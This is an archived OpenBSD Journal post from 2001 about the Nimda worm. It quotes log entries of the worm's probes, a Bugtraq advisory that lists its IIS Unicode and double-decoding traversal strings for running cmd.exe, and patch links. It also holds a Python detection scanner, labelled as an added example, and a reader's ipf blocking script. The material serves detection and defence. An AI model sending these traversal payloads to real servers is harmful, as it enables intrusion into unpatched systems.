OpenBSD Journal

Nimda worm traffic signature

Contributed by Dengue on from the attempt-to-head-off-a-ton-of-questions-to-misc@ dept.

Another Windows worm is on the loose. It's named Nimda, and naturally it targets IIS on NT/2k. Why, you ask, do I care? Because I noticed during the whole 'Code Red' thing that people kept sending log excerpts to misc@ asking if they were being attacked. Now, granted, the *.exe in the URL is a dead giveaway, but I'll still bet you this shows up on misc@. It spreads via multiple vectors, one of which is visiting an infected site using Internet Explorer. So think about that before you get curious and visit your *attacker* after they show up in your logs.

This is what the traffic looks like [*source address sanitized*]:

0.0.0.0 - - [19/Sep/2001:02:12:00 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 403 214 "-" "-"
0.0.0.0 - - [19/Sep/2001:02:12:00 +0000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 403 212 "-" "-"
0.0.0.0 - - [19/Sep/2001:02:12:01 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 222 "-" "-"
0.0.0.0 - - [19/Sep/2001:02:12:01 +0000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 222 "-" "-"
0.0.0.0 - - [19/Sep/2001:02:12:01 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 236 "-" "-"
0.0.0.0 - - [19/Sep/2001:02:12:01 +0000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 253 "-" "-"
0.0.0.0 - - [19/Sep/2001:02:12:01 +0000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 253 "-" "-"
0.0.0.0 - - [19/Sep/2001:02:12:02 +0000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 269 "-" "-"
0.0.0.0 - - [19/Sep/2001:02:12:02 +0000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 235 "-" "-"
0.0.0.0 - - [19/Sep/2001:02:12:02 +0000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
0.0.0.0 - - [19/Sep/2001:02:12:02 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 235 "-" "-"
0.0.0.0 - - [19/Sep/2001:02:12:03 +0000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 235 "-" "-"
0.0.0.0 - - [19/Sep/2001:02:12:03 +0000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
0.0.0.0 - - [19/Sep/2001:02:12:03 +0000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
0.0.0.0 - - [19/Sep/2001:02:12:03 +0000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 236 "-" "-"
0.0.0.0 - - [19/Sep/2001:02:12:03 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 236 "-" "-"

The BUGTRAQ summary follows.


Subject: Nimda Worm
Date: Tue, 18 Sep 2001 18:49:43 -0600 (MDT)
From: Dave Ahmad

Hey,

We have been receiving reports of a new worm from a large number of users.
Instead of deluging BUGTRAQ with traffic more appropriate for INCIDENTS,
we are posting a summary of the worm and the vulnerabilities it exploits:

A new worm named W32/Nimda-A (known aliases are Nimda,
Minda, Concept V, Code Rainbow) began to proliferate the morning of
September 18, 2001 on an extremely large scale that targets the Microsoft
Windows platform.  It attempts to spread via three mechanisms: as an email
attachment, a web defacement download, and through exploitation of known
IIS vulnerabilities.  Collateral damage includes network performance
degradation due to high consumption of bandwidth during the propagation
process.  There have been reports of Apache servers being inadvertently
affected by Nimda by being subjected to a denial of service condition (the
configuration of these servers is not known).

This worm takes advantage of multiple vulnerabilities
and backdoors.  The worm spreads via e-mail and the web.  Through the
e-mail vector, the worm arrives in the user's inbox as a message with a
variable subject line.  The e-mail contains an attachment named
'readme.exe'. This worm formats the e-mail in such a way as to take
advantage of a hole in older versions of Internet Explorer.  Outlook
mail clients use the Internet Explorer libraries to display HTML e-mail,
so by extension Outlook and Outlook Express are vulnerable as well, if
Internet Explorer is vulnerable.  The hole allows the readme.exe program
to execute automatically as soon as the e-mail is previewed or read.

Once it has infected a new victim, it mails copies of itself to other
potential victims, and begins scanning for vulnerable IIS Web servers.
When scanning for vulnerable IIS servers, it attempts to exploit the
Unicode hole (bid 1806) and the escaped characters decoding command
execution vulnerability (bid 2708).  It also attempts to access
the system via the root.exe backdoor left by Code Red II.  Once it
finds a vulnerable IIS server, it installs itself in such a way that
visitors to the now-infected web site will be sent a copy of a .eml
file, which is a copy of the e-mail that gets sent.  If the victim is
using Internet Explorer as their browser, and they are vulnerable to the
hole, they will execute the readme.exe attachment in the same way as if
they had viewed an infected e-mail message.

Attack Data:

Examination of the worm reveals the following attack strings
used to exploit IIS Web servers.

'/scripts/..%255c..'
'/_vti_bin/..%255c../..%255c../..%255c..'
'/_mem_bin/..%255c../..%255c../..%255c..'
'/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%'
'/scripts/..%c1%1c..'
'/scripts/..%c0%2f..'
'/scripts/..%c0%af..'
'/scripts/..%c1%9c..'
'/scripts/..%%35%63..'
'/scripts/..%%35c..'
'/scripts/..%25%35%63..'
'/scripts/..%252f..'

To those strings are added /winnt/system32/cmd.exe?/c+dir

Other attacks include:

'/scripts/root.exe?/c+dir'
'/MSADC/root.exe?/c+dir'

It is believed that all of the vulnerabilities exploited by this worm are
known.

The links below provide fix information.  Administrators and users are
advised to apply patches as soon as possible.  If further analysis
concludes that other vulnerabilities are involved, updated information
will be posted to the list.

See:

Bugtraq ID: 2524 / CVE ID: CAN-2001-0154
Microsoft Security Bulletin MS01-020
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS01-020.asp
VulDB: http://www.securityfocus.com/bid/2524

Bugtraq ID: 2708 / CVE ID:  CAN-2001-0333
Microsoft Security Bulletin MS01-026
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS01-026.asp
VulDB: http://www.securityfocus.com/bid/2708

Bugtraq ID: 1806 / CVE ID:  CVE-2000-0884
Microsoft Security Bulletin MS00-078
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS00-078.asp
http://www.securityfocus.com/bid/1806

Microsoft IIS Lockdown Tool:

http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsolutions/security/tools/locktool.asp

References:

Symantec W32.Nimda.A@mm
http://www.symantec.com/avcenter/venc/data/w32.nimda.a@mm.html

McAfee W32/Nimda@MM
http://vil.nai.com/vil/virusSummary.asp?virus_k=99209

Sophos W32/Nimda-A
http://www.sophos.com/virusinfo/analyses/w32nimdaa.html

For discussion of infection or attack attempts, subscribe to the INCIDENTS
mailing list.  For discussion of the worm itself and others, FORENSICS and
FOCUS-VIRUS are more appropriate than BUGTRAQ.

---

Dave Ahmad
Security Focus
www.securityfocus.com


I grabbed the readme.eml file that it uses as one of its infection vectors and decoded the exploit.
@Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
Nice to see it's copyrighted 8-)
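As an added example (not from the article or the Bugtraq post), here is a small Python scanner that classifies the request strings shown in the log excerpt and in the attack-string list above by the IIS weakness each one exercises: the root.exe backdoor, the overlong-UTF-8 traversal (bid 1806), and the double-decoding bug (bid 2708). Rather than matching the listed strings literally, it decodes the path once, as a correct server would, and flags any path in which a separator is still percent-encoded afterwards, so it also catches double-encoding variants the list does not spell out. It assumes Apache common log format; the sample lines and their addresses are constructed.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote
# One Apache common-log line: host ident user [time] "method path proto" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
OVERLONG_UTF8 = re.compile(r"%c[01]%[0-9a-f]{2}")  # %c0%af, %c1%9c ...: bid 1806
ENCODED_SEPARATOR = re.compile(r"%(5c|2f)")        # '\' or '/' still escaped

def classify(path):
    """Return the probe classes a request path matches (empty tuple if none)."""
    p = path.lower()
    tags = set()
    if "/root.exe" in p:
        tags.add("root.exe-backdoor")          # Code Red II leftover
    if OVERLONG_UTF8.search(p):
        tags.add("unicode-traversal")          # bid 1806 (MS00-078)
    # Decode once, as a correct server does.  If a path separator is *still*
    # percent-encoded afterwards, the request needs the second decoding pass
    # that IIS performed (bid 2708, MS01-026): %255c, %252f, %%35c, %25%35%63.
    if ENCODED_SEPARATOR.search(unquote(p)):
        tags.add("double-decode")
    if "cmd.exe?" in p and not tags:
        tags.add("cmd.exe-direct")             # /c/winnt/system32/cmd.exe?...
    return tuple(sorted(tags))

def scan(lines):
    """Map each source host to a Counter of probe classes seen in the log lines."""
    hits = defaultdict(Counter)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        host, _method, path, _status = m.groups()
        for tag in classify(path):
            hits[host][tag] += 1
    return hits

# Constructed sample: probes from the article above, with RFC 5737 test addresses.
SAMPLE_LOG = """\
192.0.2.10 - - [19/Sep/2001:02:12:00 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 403 214 "-" "-"
192.0.2.10 - - [19/Sep/2001:02:12:01 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 236 "-" "-"
192.0.2.10 - - [19/Sep/2001:02:12:02 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 235 "-" "-"
192.0.2.10 - - [19/Sep/2001:02:12:03 +0000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
198.51.100.7 - - [19/Sep/2001:02:13:00 +0000] "GET /index.html HTTP/1.0" 200 1024 "-" "Mozilla/4.0"
""".splitlines()

if __name__ == "__main__":
    for host, counts in scan(SAMPLE_LOG).items():
        print(host, dict(counts))
```

The per-host Counter is the same information the cron script in the comments below derives with grep and awk, with the added benefit of telling you which variant hit you; hosts that only ever send probes of the first three classes are the ones worth a block rule.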



Comments
  1. By earx

    300 lines in my log on a few hours...

  2. By Will Macdonald (wfm at macscan.co.uk)

    In the firewall at work I have a line saying:
    pass in quick on ep0 proto tcp from any to 123.123.123.123/32 port = 80 flags S keep state

    This has worked fine for the last couple of months, however this Nimda virus seems to have caused VERY erratic behaviour. I am assuming this is because I use the 'keep state' command, and the firewall is running out of resources with the thousands of requests it needs to keep track of?

    Would this erratic behaviour have been avoided if I had just removed the 'flags S keep state' command and let everything on port 80 through?

    Will

  3. By Morten Liebach (morten@hotpost.dk, https://pc89225.stofanet.dk/)

    There's this CERT advisory out now too.

    I've now set my personal apache up to run as SSL only, gets rid of a lot of the crap!

    Take care, have fun

    Morten

  4. By pravus

    I put this in cron to run every 5 minutes to block out hosts that have tried to exploit my machine. Not the most elegant, but it works for me.

    #!/bin/sh
    # Run from cron: collect the source addresses of cmd.exe/root.exe probes
    # in the web server log and prepend a block rule for each to the ipf
    # ruleset.  Log path and the interface name (fxp1) are site-specific.

    HTTP_LOG="/path/to/access_log"
    RULE_IPF="/etc/ipf.rules"
    # mktemp(1) rather than a predictable /tmp/$$ name, so another local
    # user cannot pre-create or symlink the file the ruleset is built in.
    FILE_TMP=$(mktemp /tmp/ipf.XXXXXXXXXX) || exit 1

    echo "# --- BLACKLIST --- #" > "$FILE_TMP"
    # Plain grep treats '|' literally and would match nothing; -E gives
    # alternation, and '.' and '?' are escaped to match the literal strings.
    grep -E 'cmd\.exe\?|root\.exe\?' "$HTTP_LOG" |
    awk '{print $1}' |
    sort -u |
    while read -r ip; do
        echo "block in log quick on fxp1 from $ip/32 to any" >> "$FILE_TMP"
    done
    echo "# --- BLACKLIST --- #" >> "$FILE_TMP"
    echo >> "$FILE_TMP"

    # Existing rules go after the blacklist so the 'quick' blocks win.
    cat "$RULE_IPF" >> "$FILE_TMP"

    # Flush the active rule set and load the combined file in its place.
    ipf -A -Fa -f "$FILE_TMP"

    rm -f "$FILE_TMP"

Copyright © - Daniel Hartmeier. All rights reserved. Articles and comments are copyright their respective authors, submission implies license to publish on this web site. Contents of the archive prior to as well as images and HTML templates were copied from the fabulous original deadly.org with Jose's and Jim's kind permission. This journal runs as CGI with httpd(8) on OpenBSD, the source code is BSD licensed. undeadly \Un*dead"ly\, a. Not subject to death; immortal. [Obs.]